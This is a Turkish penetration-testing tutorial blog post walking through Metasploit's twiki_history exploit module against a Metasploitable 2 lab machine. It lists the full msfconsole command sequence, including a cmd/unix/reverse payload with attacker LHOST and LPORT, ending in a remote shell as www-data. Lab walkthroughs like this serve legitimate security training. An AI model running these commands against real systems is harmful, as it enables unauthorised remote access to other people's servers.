MSF twiki_history İstismar Modülü ile Uygulama Zafiyetinin İstismar Edilerek Meterpreter Bağlantısının Elde Edilmesi

0
270
views
Sızma testleri sırasında tespit edilen zafiyetlerin istismarı ile hedef sistemlerde bir takım yetkiler elde edilebilir. Bu yazıda, Metasploitable 2 üzerindeki Twiki‘nin bir bileşenine ait zafiyet tespit edildikten sonra istismar edilecek ve kullanıcı hakları ile Meterpreter bağlantısı elde edilecektir.

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

IP adresi 100.100.200.7 olan Metasploitable 2’deki zafiyetin istismar işlemi için Metaplosploit Framework içerisindeki twiki_history istismar modülü kullanılabilir.

search twiki
use exploit/unix/webapp/twiki_history
show options

acquiring-meterpreter-shell-on-linux-by-using-msf-twiki-history-exploit-module-01

 

MSF modülüne hedef sistemin IP adresi verilerek istismar işlemi gerçekleştirilebilir. Ancak bazı durumlarda LHOST/LPORT gibi değerlerin ayarlı olarak gelmediği görülebilir. Bu sebeple PAYLOAD verilerek modül seçenekleri incelenebilir.

set RHOST 100.100.200.7
set PAYLOAD cmd/unix/reverse
show options

acquiring-meterpreter-shell-on-linux-by-using-msf-twiki-history-exploit-module-02

 

LHOST ve LPORT değerleri ayarlandıktan sonra istismar işlemi gerçekleştirilir.

set LHOST 100.100.200.4
set LPORT 4456
run
id

acquiring-meterpreter-shell-on-linux-by-using-msf-twiki-history-exploit-module-03

 

Servisi çalıştıran hesap (www-data) yetkileri ile Meterpreter bağlantısı elde edilmiştir.

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

CEVAP VER

Yorumunuzu giriniz
İsminizi giriniz

Bu site, istenmeyenleri azaltmak için Akismet kullanıyor. Yorum verilerinizin nasıl işlendiği hakkında daha fazla bilgi edinin.